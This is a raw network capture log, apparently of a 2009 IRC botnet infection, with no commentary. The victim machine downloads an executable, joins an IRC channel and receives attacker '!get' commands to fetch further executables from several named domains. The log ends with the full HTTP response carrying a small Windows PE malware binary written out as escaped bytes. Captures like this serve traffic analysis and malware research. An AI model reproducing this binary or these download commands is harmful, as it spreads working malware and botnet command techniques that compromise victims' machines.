VICTIM:  	GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 95.75.125.173:739 
VICTIM:  	NICK amwbtvxyUSER i020501 . . :- 
VICTIM:  	JOIN &virtu 
ATTACKER:	:u. PRIVMSG amwbtvxy :!get http:/dl.guarddog2009.com/inst.php?id=32&sid=0:u. PRIVMSG amwbtvxy :!get http:/dl.guarddog2009.com/bookmark.exe:u. PRIVMSG amwbtvxy :!get http:/komojoke.cn/txt/read.txt:u. PRIVMSG amwbtvxy :!get http:/colopin.cn/oc/box.txt 
ATTACKER:	GET /inst.php?id=32&sid=0 HTTP/1.0User-Agent: DownloadHost: dl.guarddog2009.comPragma: no-cache 
ATTACKER:	GET /bookmark.exe HTTP/1.0User-Agent: DownloadHost: dl.guarddog2009.comPragma: no-cache 
ATTACKER:	HTTP/1.1 200 OKDate: Fri, 13 Nov 2009 21:47:47 GMTServer: ApacheLast-Modified: Wed, 11 Nov 2009 16:20:49 GMTETag: \770256-a00-cf491a40\Accept-Ranges: bytesContent-Length: 2560Connection: closeContent-Type: application/octet-streamMZ\220\000\003\000\000\000\004\000\000\000\377\377\000\000\270\000\000\000\000\000\000\000@\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\310\000\000\000\016\037\272\016\000\264\t\315!\270\001L\315!This program cannot be run in DOS mode.\$\000\000\000\000\000\000\000\001u\363\331E\024\235\212E\024\235\212E\024\235\212E\024\235\212V\024\235\212Ll\010\212D\024\235\212Ll\014\212D\024\235\212RichE\024\235\212\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000PE\000\000L\001\003\000\321\340\372J\000\000\000\000\000\000\000\000\340\000\003\001\013\001\t\000\000\002\000\000\000\006\000\000\000\000\000\000\000\020\000\000\000\020\000\000\000 \000\000\000\000@\000\000\020\000\000\000\002\000\000\005\000\000\000\000\000\000\000\005\000\000\000\000\000\000\000\000@\000\000\000\004\000\000\000\000\000\000\002\000\000\200\000\000\020\000\000\020\000\000\000\000\020\000\000\020\000\000\000\000\000\000\020\000\000\000\000\000\000\000\000\000\000\000< \000\000P\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000 \000\000<\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000.text\000\000\000\334\001\000\000\000\020\000\000\000\002\000\000\000\004\000\000\000\000\000\000\000\000\000\000\000\000\000\000 \000\000`.rdata\000\000\236\001\000\000\000 \000\000\000\002\000\000\000\006\000\000\000\000\000\000\000\000\000\000\000\000\000\000@\000\000@.data\000\000\000\230\002\000\000\0000\000\000\000\002\000\000\000\010\000\000\000\000\000\000\000\000\000\000\000\000\000\000@\000\000\300\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\307\005\2041@\000\200\000\000\000j\000j\000j\000j\000h\2041@\000h\0041@\000\3775\0001@\000h\003\000\000\200\350\230\001\000\000\205\300\017\205X\001\000\000h\0041@\000hG0@\000h\2101@\000\350p\001\000\000\203\304\014h\2102@\000j\001j\000h\2101@\000h\003\000\000\200\350g\001\000\000\205\300\017\205\260\000\000\000\307\005\2142@\000\000\001\000\000h\2142@\000h\2101@\000j\000j\000h\2130@\000\3775\2102@\000\350=\001\000\000\3775\2102@\000\350 \001\000\000h\2101@\000\350\001\000\000\213\360h\2250@\000h\2101@\000\350\363\000\000\000j 
ATTACKER:	\000h\200\000\000\000j\002j\000j\001h\000\000\000@h\2101@\000\350\305\000\000\000\205\300tB\213\330h\2540@\000\350\315\000\000\000j\000h\2242@\000Ph\2540@\000S\350\256\000\000\000h\0000@\000\350\260\000\000\000j\000h\2242@\000Ph\0000@\000S\350\221\000\000\000S\350y\000\000\000h\0041@\000h\3050@\000h\2101@\000\350\211\000\000\000\203\304\014h\2102@\000h\006\000\002\000j\000h\2101@\000h\003\000\000\200\350}\000\000\000\205\300u0h\0000@\000\350W\000\000\000@Ph\0000@\000j\001j\000h\3620@\000\3775\2102@\000\350`\000\000\000\3775\2102@\000\350=\000\000\000\377\005\0001@\000\351t\376\377\377j\000\350\000\000\000\314\377%\030 @\000\377%( @\000\377%\$ @\000\377%  @\000\377%\034 @\000\377%, @\000\377%4 @\000\377%\010 @\000\377%\004 @\000\377%\000 @\000\377%\020 @\000\377%\014 @\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000Z!\000\000J!\000\000